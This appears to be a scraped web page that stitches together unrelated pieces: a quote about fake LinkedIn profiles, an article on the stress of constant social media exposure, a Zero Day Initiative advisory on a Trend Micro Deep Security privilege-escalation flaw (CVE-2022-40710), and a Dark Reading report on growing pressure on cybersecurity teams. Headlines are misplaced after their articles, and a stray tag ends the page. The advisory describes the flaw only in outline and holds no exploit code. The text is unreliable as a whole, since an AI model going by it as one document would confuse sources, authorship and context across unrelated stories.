“What’s clear is that LinkedIn’s cachet as being the social network for serious professionals makes it the perfect platform for lulling members into a false sense of security,” Bloomberg’s **Tim Cuplan** wrote. “Exacerbating the security risk is the vast amount of data that LinkedIn collates and publishes, and which underpins its whole business model but which lacks any robust verification mechanisms.”

Glut of Fake LinkedIn Profiles Pits HR Against the Bots

Constantly posting content on social media can erode your privacy—and sense of self.

To be online is to be constantly exposed. While it may seem normal, it’s a level of exposure we’ve never dealt with before as human beings. We’re posting on Twitter, and people we’ve never met are responding with their thoughts and criticisms. People are looking at your latest Instagram selfie. They’re literally swiping on your face. Messages are piling up. It can sometimes feel like the whole world has its eyes on you.

Being observed by so many people appears to have significant psychological effects. There are, of course, good things about this ability to connect with others. It was crucial during the height of the pandemic when we couldn’t be close to our loved ones, for example. However, experts say there are also numerous downsides, and these may be more complex and persistent than we realize.

Studies have found that high levels of social media use are connected with an increased risk of symptoms of anxiety and depression. There appears to be substantial evidence connecting people’s mental health and their online habits. Furthermore, many psychologists believe people may be dealing with psychological effects that are pervasive but not always obvious.

“What we’re finding is people are spending way more time on screens than previously reported or than they believe they are,” says Larry Rosen, professor emeritus of psychology at California State University, Dominguez Hills. “It’s become somewhat of an epidemic.”

Rosen has been studying the psychological effects of technology since 1984, and he says he’s watched things “spiral out of control.” He says people are receiving dozens of notifications every day and that they often feel they can’t escape their online lives.

“Even when you’re not on the screens, the screens are in your head,” Rosen says.

One value of privacy is that it gives us space to operate without judgment. When we’re using social media, there are often a lot of strangers viewing our content, liking it, commenting on it, and sharing it with their own communities. Any time we post something online, thus exposing a part of who we are, we don’t fully know how we’re being received in the virtual world. Fallon Goodman, an assistant professor of psychology at George Washington University, says not knowing what kind of impression you’re making online can cause stress and anxiety.

“When you post a picture, the only real data you get are people’s likes and comments. That’s not necessarily a true indication of what the world feels about your picture or your post,” Goodman says. “Now you’ve put yourself out there—in a semi-permanent way—and you have limited information about how that was received, so you have limited information about the evaluations people are making about you.”

Anna Lembke, a professor of psychiatric and behavioral sciences at Stanford University, says we construct our identities through how we’re seen by others. Much of that identity is now formed on the internet, and that can be difficult to grapple with.

“This virtual identity is a composition of all of these online interactions that we have. It is a very vulnerable identity because it exists in cyberspace. In a weird kind of way we don’t have control over it,” Lembke says. “We’re very exposed.”

Without the ability to find out how their identity is ricocheting around the virtual world, people often feel a fight-or-flight response when they’ve been online for many hours—and even after they’ve logged off.

“It’s kind of an adapted hyper-vigilance. As soon as you send something out into the virtual world, you’re sort of sitting on pins and needles waiting for a response,” Lembke says. “That alone—that kind of expectancy—is a state of hyperarousal. How will people respond to this? When will they respond? What will they say?”

It would be one thing if only you saw any negative reactions, Lembke says, but they’re often available for everyone to see. She says this exacerbates feelings of shame and self-loathing that are already “endemic” in the modern world.

We are social creatures, and our brains evolved to form communities, communicate with each other, and work together. We have not evolved to expose ourselves to the judgment of the whole world on a daily basis. These things affect everyone differently, but it’s clear many people regularly feel overwhelmed by this exposure level.

If we’re not careful, our online lives can become a source of chronic stress that subtly seeps into everything. Everyone needs some privacy, but we often don’t provide it for ourselves and end up feeling like we’re constantly battling invisible enemies.

There are things you can do for yourself, however. You can turn off your notifications for social media apps, reduce how much time you spend on them, limit when you allow yourself to use them, and more. Goodman says it sometimes helps to keep your phone in the other room so you’re not so easily tempted to pick it up.

Lembke says we need to change how we think about social media and internet use as a society. She calls it a “collective” problem, not just an individual one.

“We need to come up with a kind of cultural etiquette around what appropriate and healthy consumption is, just like we have for other consumptive problems,” Lembke says. “We have nonsmoking areas. We don’t eat ice cream for breakfast. We have all kinds of laws around who can buy and consume alcohol, who can go into a casino. We need guardrails for these digital products, especially for minors.”

The High Cost of Living Your Life Online

A link following vulnerability in Trend Micro Deep Security 20 and Cloud One - Workload Security Agent for Windows could allow a local attacker to escalate privileges on affected installations.

Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.

September 23rd, 2022

**Trend Micro Deep Security Link Following Local Privilege Escalation Vulnerability****ZDI-22-1296  
ZDI-CAN-15467**

CVE ID

CVE-2022-40710

CVSS SCORE

7.8, (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)

AFFECTED VENDORS

Trend Micro  

AFFECTED PRODUCTS

Deep Security  

VULNERABILITY DETAILS

This vulnerability allows local attackers to escalate privileges on affected installations of Trend Micro Deep Security. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.

The specific flaw exists within the Trend Micro Anti-Malware Solution Platform. By creating a symbolic link, an attacker can abuse the service to delete a file. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM.  

ADDITIONAL DETAILS

Trend Micro has issued an update to correct this vulnerability. More details can be found at:  
https://success.trendmicro.com/solution/000291590  

DISCLOSURE TIMELINE

*   2022-03-02 - Vulnerability reported to vendor
*   2022-09-23 - Coordinated public release of advisory

CREDIT

Abdelhamid Naceri  

BACK TO ADVISORIES

CVE-2022-40710: ZDI-22-1296

Why cyber teams are now front and center for business enablement within organizations, and the significant challenges they face.

The past two years have marked a host of changes for cybersecurity professionals, as the pandemic, the ransomware tsunami, and increasing political and regulatory scrutiny have all created mounting expectations as their role becomes part and parcel with the lifeblood of organizations.

In a session at next week's SecTor 2022 conference taking place in Toronto, Tony Anscombe, chief security evangelist at ESET, will address this recent period of upheaval and role evolution, and what cyberteams can expect going forward. The bottom line? They should be prepared for pressure, pressure, and more pressure.

**2020–2022: Cybersecurity Grows in Stature, Pressure Mounts**

During his panel on Oct. 5, entitled "Two Years of Accelerated Cybersecurity and the Demands Being Placed on Cyber Defenders," Anscombe will discuss how the importance of implementing a good cybersecurity team and platforms really became a conversation when the COVID-19 pandemic lockdowns sent everyone home — and more importantly, how it marked the beginning of a two-year evolution of cyber-defense having a central role in business discussions.

"The use of cloud technologies and remote desktop protocol (RDP) were hallmarks of 2020 being the year of digital transformation," he tells Dark Reading. "But it was also a year of cybersecurity transformation, because those teams began the move from a back-office role to the front office; they became the business enabler as opposed to the business obstacle. Companies were saying, 'OK, everybody's gone home — how do we keep going?' And realistically it was the security team that was the enabler for remote working, online ordering for the sandwich shops, taking remote payments, and other basic needs."

Thus, 2020 saw cybersecurity teams became far more visible in the daily life of businesses; but that was just the beginning of an ongoing elevation in stature, Anscombe explains — because then, ransomware attacks began accelerating, and ransom amounts started growing.

He explains that this period represents a tipping point for when it became commonplace for ransomware-as-a-service (RaaS) gangs to go after millions of dollars in a single hit, such as $4.4 million for Colonial Pipeline; $40 million for CNA Financial; and $70 million for Kaseya, to name just a few. Thus, ransomware became an important existential crisis for companies, and ransomware gangs became a near-ubiquitous threat.

"We saw an entire evolution of monetization in that particular year, which lured cybercriminals in and made it a business imperative to deal with, and then it became a frontline political issue after the attack on Colonial Pipeline," Anscombe says. "So you saw government stepping up and saying, 'Hey, we need to do something about cybercrime, we have voters lining up outside gas stations.'"

This year, the political aspects of cybercrime have only been exacerbated, he says, thanks to the conflict in Ukraine: "You see all the agencies around the world saying we need to protect critical infrastructure from nation-state attacks etc., so that's upping of the game again."

Defense is meanwhile easier said than done, as ransomware actors continue to grow in sophistication.

"At the moment, I think as a cybersecurity defender ... you've got these ransomware attacks that were once attachments of emails that are now advanced persistent threat (APT)-style attacks exploiting long-term vulnerabilities in systems, putting their markers in networks and coming back to them later on," Anscombe says.

**Regulation & Reporting Requirements Up the Ante**

Where cyberteams sit within the hierarchy of businesses has also been affected by additional regulation and cyber-incident reporting requirements, which creates the need for a cross-discipline discussion of risk with legal and compliance departments, Anscombe also notes. This creates enormous pressure on cyberteams thanks to fact that the sheer number of requirements is growing, creating thorny complexities.

"Imagine you're a public company, and you're in insurance or the finance industry, and you do business internationally, you've got to comply with privacy requirements for the California Consumer Privacy Act and GDPR, you've got to meet the FDIC's cyber-incident reporting requirements," he explains. "The SEC has proposed others. And if you're a water utility company, you might have to comply with the critical infrastructure reporting. This is becoming very bureaucratic, and it needs to be harmonized in some way."

He adds, "Most importantly, the role of the cyber-defender is about to change significantly again, because you're probably going to have to have a paralegal sitting at the end of the desk during incident response. And, one of the big, big challenges for a lot of businesses will be adhering to their cyber-risk insurance policy, which affects the finance department. It's kind of the backstop, you're going to have to fall back on these policies. And the policies are becoming more stringent."

Meanwhile, all of these increased and new pressures that security teams are feeling are exacerbating some of the existing challenges, such as the workforce-gap issue — which Anscombe believes will create even more change for cyber-defense teams.

"I think all of this change just puts more burden on the cybersecurity resourcing issue, and become even more challenging for companies that to find the right level of people," Anscombe says. "Does that mean companies then go to managed service providers (MSPs)? Does it mean they start dragging in more resource from partners? Does it mean more of it becomes outsourced? I think that's a maybe the thing to watch for the 2023 segment of cyber."

Tag

#acer